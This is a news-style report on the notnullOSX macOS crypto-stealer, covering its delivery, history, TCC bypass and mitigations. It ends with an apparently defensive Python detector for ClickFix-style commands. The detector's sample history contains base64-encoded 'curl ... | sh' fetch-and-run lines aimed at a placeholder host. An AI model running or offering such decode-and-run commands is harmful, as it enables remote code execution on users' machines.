In a concerning development for macOS users, cybersecurity researchers have uncovered a new information-stealing malware named notnullOSX, which specifically targets cryptocurrency holders with wallets exceeding $10,000. Notably, attackers have designed this threat with precision, combining advanced social engineering tactics with stealthy delivery mechanisms to compromise Apple systems.
To begin with, the malware—written in Go—uses two distinct delivery methods. First, attackers leverage ClickFix social engineering, tricking victims into executing malicious commands. Meanwhile, the second approach involves distributing malicious DMG disk image files that appear legitimate. In both scenarios, victims unknowingly install the malware without triggering macOS security alerts, making detection extremely difficult.
The origins of notnullOSX date back to 2022, when a developer known as 0xFFF introduced an early version of a macOS stealer on underground forums. However, after a sudden disappearance in 2023—reportedly caused by a fabricated law enforcement tip—the developer vanished, leaving subscribers without refunds. Later, in August 2024, the same individual resurfaced under the alias alh1mik, apologized publicly, and began accepting preorders for an upgraded malware service priced at $400 per month. By 2026, that offering had evolved into the current notnullOSX campaign.
According to Moonlock Lab researchers, the first confirmed detections appeared on March 30, 2026, across Vietnam, Taiwan, and Spain. Their findings reveal a highly selective targeting process. Before launching an attack, operators must submit detailed victim profiles, including social media accounts, wallet addresses, and communication history. Importantly, the system automatically rejects targets with wallets below $10,000, highlighting the attackers’ focus on high-value victims.
The infection process typically starts with a fake Google document displaying an encryption error. Victims are then prompted to take action, which leads them down one of two malicious paths. In the ClickFix scenario, users paste a base64-encoded command into Terminal, unknowingly executing a remote script. Alternatively, the DMG route provides a seemingly harmless installer package that performs the same malicious activity.
Furthermore, attackers have expanded their distribution strategy. They created a fake wallpaper application named “WallSpace,” hosted on a deceptive website, and promoted it via a hijacked YouTube channel. The video gained 50,000 views within two weeks, suggesting paid promotion or SEO manipulation tactics.
What makes notnullOSX particularly dangerous, however, is its ability to bypass macOS security controls. Instead of exploiting vulnerabilities directly, it manipulates users into granting Full Disk Access, effectively bypassing Apple’s Transparency, Consent, and Control (TCC) framework. Once granted, the malware gains unrestricted access to sensitive data without additional alerts.
Additionally, the malware operates using a modular architecture, downloading specific components from its command-and-control (C2) server for targeted data theft. One critical module, ReplaceApp, silently replaces legitimate applications such as Ledger Live with trojanized versions to capture seed phrases.
Beyond data theft, notnullOSX maintains persistent communication with its C2 server through WebSocket connections, enabling continuous monitoring and remote command execution—behavior typically associated with advanced remote access trojans.
To mitigate risks, Moonlock Lab advises organizations to block known C2 domains, monitor unusual Full Disk Access requests, and track suspicious activity in system directories. Meanwhile, individual users should avoid executing Terminal commands from untrusted sources and remain cautious of applications requesting excessive permissions.
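As an added illustration of the ClickFix path described above and the advice to avoid pasting Terminal commands from untrusted sources (example code written for this page, not Moonlock Lab's tooling): a Python check that flags shell-history lines where base64-decoded output is handed to an interpreter, and reports what the embedded blob decodes to. The history lines, command shapes and placeholder host are constructed assumptions, not indicators from the campaign.

```python
import base64
import re
import shlex

SHELL_SINKS = {"sh", "bash", "zsh", "osascript", "python3", "perl"}  # run whatever they are fed
FETCH_MARKERS = ("curl", "wget", "http://", "https://", "osascript")  # remote fetch-and-run hints
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
DECODE_RE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")

def first_word(stage):
    """Program name of a pipeline stage, tolerating unbalanced quotes."""
    try:
        toks = shlex.split(stage)
    except ValueError:
        toks = stage.split()
    return toks[0].rsplit("/", 1)[-1] if toks else ""

def decode_tokens(cmd):
    """Decode every base64-looking token in the command that yields UTF-8 text."""
    out = []
    for m in B64_TOKEN.finditer(cmd):
        try:
            out.append(base64.b64decode(m.group(0), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out

def analyse_command(cmd):
    """Reasons a Terminal command resembles a ClickFix decode-and-run; [] if none."""
    reasons = []
    if DECODE_RE.search(cmd):
        stages = [s.strip() for s in cmd.split("|")]
        sink = first_word(stages[-1])
        if len(stages) > 1 and sink in SHELL_SINKS:
            reasons.append(f"base64 output piped into {sink}")
        if first_word(cmd) in SHELL_SINKS and re.search(r"\$\(.*base64", cmd):
            reasons.append("interpreter run on a base64 command substitution")
    for text in decode_tokens(cmd):
        hits = [mk for mk in FETCH_MARKERS if mk in text]
        if hits:
            reasons.append("decoded payload references " + ", ".join(hits))
    return reasons

def scan_history(lines):
    """Indexes of history lines that raise at least one reason."""
    return [i for i, line in enumerate(lines) if analyse_command(line)]

# Constructed sample shell history; the host is a placeholder, not a real indicator.
PAYLOAD = "curl -fsSL https://example.invalid/loader.sh | sh"
BLOB = base64.b64encode(PAYLOAD.encode()).decode()
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    f"echo '{BLOB}' | base64 -D | sh",
    f'bash -c "$(echo {BLOB} | base64 -d)"',
    "cat notes.txt | base64 -d > out.bin",  # decodes, but nothing executes the output
]
```

Running `scan_history` over a user's `~/.zsh_history` (or over a command-line field in endpoint telemetry) surfaces the decode-and-run shape without flagging ordinary `base64 -d` use.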